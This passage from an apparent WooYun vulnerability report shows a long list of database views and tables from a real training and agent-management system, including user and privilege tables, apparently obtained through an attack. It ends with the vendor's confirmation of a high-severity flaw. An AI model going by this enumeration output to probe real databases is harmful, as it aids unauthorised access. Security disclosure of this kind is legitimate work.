| dbo.ViewAcademyStudentByBranchs05 |
| dbo.ViewAcademyStudentByBranchs06 |
| dbo.ViewAcademyStudentByTeams00 |
| dbo.ViewAcademyStudentByTeams01 |
| dbo.ViewAcademyStudentByTeams02 |
| dbo.ViewAcademyStudentByTeams03 |
| dbo.ViewAcademyStudentByTeams04 |
| dbo.ViewAcademyStudentByTeams05 |
| dbo.ViewAcademyStudentByTeams06 |
| dbo.ViewAcademyStudentByZones00 |
| dbo.ViewAcademyStudentByZones01 |
| dbo.ViewAcademyStudentByZones02 |
| dbo.ViewAcademyStudentByZones03 |
| dbo.ViewAcademyStudentByZones04 |
| dbo.ViewAcademyStudentByZones05 |
| dbo.ViewAcademyStudentByZones06 |
| dbo.ViewAcademyStudentCourseMark01 |
| dbo.ViewAcademyStudentCourseMark02 |
| dbo.ViewAcademyStudentCourseMark03 |
| dbo.ViewAcademyStudentCourseMark04 |
| dbo.ViewAcademyStudentCourseMark11 |
| dbo.ViewAcademyStudentCourseMark12 |
| dbo.ViewAcademyStudentCourseMark13 |
| dbo.ViewAcademyStudentGroupByEmpCategory01 |
| dbo.ViewAcademyStudentGroupByEmpCategoryGender01 |
| dbo.ViewAcademyStudentGroupByGender01 |
| dbo.ViewAcademyStudentGroupByZone01 |
| dbo.ViewAcademyStudentNoOfClassRoom01 |
| dbo.ViewAcademyStudentNoOfClassRoom02 |
| dbo.ViewAcademyStudentNoOfClassRoom03 |
| dbo.ViewAcademyStudentNoOfClassRoom04 |
| dbo.ViewAcademyStudentNoOfDormitory01 |
| dbo.ViewAcademyStudentNoOfEMPTMStatus01 |
| dbo.ViewAcademyStudentNoOfMatrix01 |
| dbo.ViewAcademyStudentSatisfaction01 |
| dbo.ViewAcademyStudentSatisfaction02 |
| dbo.ViewAcademyStudentSatisfactionAVG01 |
| dbo.ViewAcademyStudentSatisfactionQ00 |
| dbo.ViewAcademyStudentSatisfactionQ01 |
| dbo.ViewAcademyStudentSatisfactionQ02 |
| dbo.ViewAcademyStudentSatisfactionQ03 |
| dbo.ViewAcademyStudentSatisfactionQ04 |
| dbo.ViewAcademyStudentSatisfactionQ05 |
| dbo.ViewAcademyStudentSatisfactionQ06 |
| dbo.ViewAcademyStudentSatisfactionQ07 |
| dbo.ViewAcademyStudentSatisfactionQ08 |
| dbo.ViewAcademyStudentSatisfactionQ09 |
| dbo.ViewAcademyStudentSatisfactionQ10 |
| dbo.ViewAcademyStudentSatisfactionQ11 |
| dbo.ViewAcademyStudentSatisfactionQ12 |
| dbo.ViewAcademyStudentSatisfactionQ13 |
| dbo.ViewAcademyStudentSatisfactionQ14 |
| dbo.ViewAcademyStudentSatisfactionQ15 |
| dbo.ViewAcademyStudentSatisfactionQ16 |
| dbo.ViewAcademyStudentSatisfactionQ17 |
| dbo.ViewAcademyStudentSatisfactionQ18 |
| dbo.ViewAcademyStudentSatisfactionQ19 |
| dbo.ViewAcademyStudentSatisfactionQ20 |
| dbo.ViewAcademyTeacher01 |
| dbo.ViewAcademyTeacherPoint01 |
| dbo.ViewBranch01 |
| dbo.ViewComments01 |
| dbo.ViewComments02 |
| dbo.ViewDivision01 |
| dbo.ViewEmpCertificateCourseMark01 |
| dbo.ViewEruditeAuditor01 |
| dbo.ViewEruditeDateDistinct01 |
| dbo.ViewEruditeDateInfo01 |
| dbo.ViewEruditeExamRoom01 |
| dbo.ViewEruditeExamRoomAuditor01 |
| dbo.ViewEruditeExamRoomEmpEnroll |
| dbo.ViewEruditeInvigilator01 |
| dbo.ViewEruditeMark01 |
| dbo.ViewInvoice01 |
| dbo.ViewInvoiceMembers01 |
| dbo.ViewNews01 |
| dbo.ViewNewsLike01 |
| dbo.ViewProductCourse01 |
| dbo.ViewProducts01 |
| dbo.ViewReaderCourse01 |
| dbo.ViewSABranch01 |
| dbo.ViewSABranch02 |
| dbo.ViewSecPrograms01 |
| dbo.ViewSecRoleProgPrivilege01 |
| dbo.ViewSecRoleProgPrivilege02 |
| dbo.ViewSecSubSystems01 |
| dbo.ViewSecSystems01 |
| dbo.ViewSecUserProgPrivilege01 |
| dbo.ViewSecUserProgPrivilegeByDistSystemCode |
| dbo.ViewSecUserRole01 |
| dbo.ViewSecUsers01 |
| dbo.ViewSuperAgent01 |
| dbo.ViewSuperAgentCandidate01 |
| dbo.ViewSuperAgentScore01 |
| dbo.ViewTCAgent01 |
| dbo.ViewTCAgentByAreaAgentTotal01 |
| dbo.ViewTCAgentByBranchAgentTotal01 |
| dbo.ViewTCAgentByCityAgentTotal01 |
| dbo.ViewTCAgentByDivisionAgentTotal01 |
| dbo.ViewTCAgentByTeamAgentTotal01 |
| dbo.ViewTCAgentByZoneAgentTotal01 |
| dbo.ViewTCArea01 |
| dbo.ViewTCBranch01 |
| dbo.ViewTCCity01 |
| dbo.ViewTCDivision01 |
| dbo.ViewTCEmpQuizMark01 |
| dbo.ViewTCEmpQuizMarkByAreaAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaQuiz01 |
| dbo.ViewTCEmpQuizMarkByAreaQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchQuiz01 |
| dbo.ViewTCEmpQuizMarkByBranchQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByCityAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByCityAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByCityQuiz01 |
| dbo.ViewTCEmpQuizMarkByCityQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByCityRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByCityUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionQuiz01 |
| dbo.ViewTCEmpQuizMarkByDivisionQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamQuiz01 |
| dbo.ViewTCEmpQuizMarkByTeamQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneQuiz01 |
| dbo.ViewTCEmpQuizMarkByZoneQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneUnQuizTotal01 |
| dbo.ViewTCEmployee01 |
| dbo.ViewTCEmployeeTempNoOfRecords01 |
| dbo.ViewTCQuizDateDistinct01 |
| dbo.ViewTCTeam01 |
| dbo.ViewTCZone01 |
| dbo.ViewTeacherPrestudyLog01 |
| dbo.ViewZTCenterArea01 |
| dbo.ViewZTCenterRoom01 |
| dbo.ViewZTClass01 |
| dbo.ViewZTClass02 |
| dbo.ViewZTClassRoom01 |
| dbo.ViewZTStudent01 |
| dbo.ViewZTStudent01SumByArea |
| dbo.ViewZTStudent01SumByAreaAbsent |
| dbo.ViewZTStudent01SumByAreaAttend |
| dbo.ViewZTStudent01SumByAreaLate |
| dbo.ViewZTStudent01SumByAreaLeave |
| dbo.ViewZTStudent01SumByAreaMark100 |
| dbo.ViewZTStudent01SumByAreaPass |
| dbo.ViewZTStudent01SumByAreaTotal |
| dbo.ViewZTStudent01SumByClassAbsent |
| dbo.ViewZTStudent01SumByClassAttend |
| dbo.ViewZTStudent01SumByClassLate |
| dbo.ViewZTStudent01SumByClassLeave |
| dbo.ViewZTStudent01SumByClassMark100 |
| dbo.ViewZTStudent01SumByClassPass |
| dbo.ViewZTStudent01SumByClassTotal |
| dbo.ViewZTStudentCourse01 |
| dbo.ViewZTStudentCourseMark01 |
| dbo.ViewZTStudentCourseMark02 |
| dbo.ViewZTStudentCourseMark03 |
| dbo.ViewZone01 |
| dbo.ZTCenter |
| dbo.ZTCenterArea |
| dbo.ZTCenterRoom |
| dbo.ZTClass |
| dbo.ZTClassRoom |
| dbo.ZTStudent |
| dbo.ZTStudentCourse |
| dbo.ZTStudentCourseMark |
| dbo.ZTStudentCourseMarkTemp |
| dbo.Zone |

修复方案:

版权声明:转载请注明来源 _Thorns@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-09 18:54

厂商回复:

确认,谢谢。

最新状态:

暂无